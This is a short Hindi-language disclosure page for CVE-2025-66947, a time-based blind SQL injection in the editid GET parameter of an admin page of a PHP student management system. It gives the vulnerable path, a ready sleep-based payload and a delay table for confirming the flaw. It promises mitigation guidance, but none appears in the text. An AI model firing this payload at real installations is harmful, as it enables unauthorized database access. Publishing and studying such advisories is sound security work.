
PHP एडमिन पैनल में समय-आधारित ब्लाइंड SQL इंजेक्शन के लिए प्रूफ-ऑफ-कॉन्सेप्ट। अनसैनिटाइज़्ड GET पैरामीटर के माध्यम से शोषण का प्रदर्शन, रक्षात्मक उपयोग के लिए शमन मार्गदर्शन के साथ।
⏱️ सामान्य प्रतिक्रिया बनाम ~6 सेकंड विलंबित प्रतिक्रिया का दृश्य तुलना
TL;DR: एक एडमिन मॉड्यूल में GET पैरामीटर प्रतिक्रिया विलंब के माध्यम से समय-आधारित SQL इंजेक्शन की अनुमति देता है।
एक समय-आधारित ब्लाइंड SQL इंजेक्शन भेद्यता krishanmuraiji SMS v1.0 में मौजूद है, जो एक प्रशासनिक मॉड्यूल में GET पैरामीटर के अनुचित सत्यापन के कारण है।
/studentms/admin/edit-class-detail.phpeditid (GET)/studentms/admin/edit-class-detail.php?editid=12
/studentms/admin/edit-class-detail.php?editid=12*if(now()=sysdate(),sleep(6),0)
| पेलोड | विलंब |
|---|---|
sleep(3) | ~3s |
sleep(6) | ~6s |
sleep(15) | ~15s |
लगातार विलंब = SQL इंजेक्शन की पुष्टि
यह भेद्यता पैटर्न सामान्यतः इनमें दिखाई देता है:
भले ही प्रमाणीकरण आवश्यक हो और त्रुटियाँ छिपी हों,
समय-आधारित SQL इंजेक्शन शोषणीय और खतरनाक बना रहता है।
गंभीरता: उच्च
CVE-2025-66947
Ranjan Kumarयह PoC केवल शैक्षिक और रक्षात्मक उद्देश्यों के लिए प्रदान किया गया है।
CVE-2025-66947, SQL Injection, Time-Based Blind SQL Injection, PHP, Admin Panel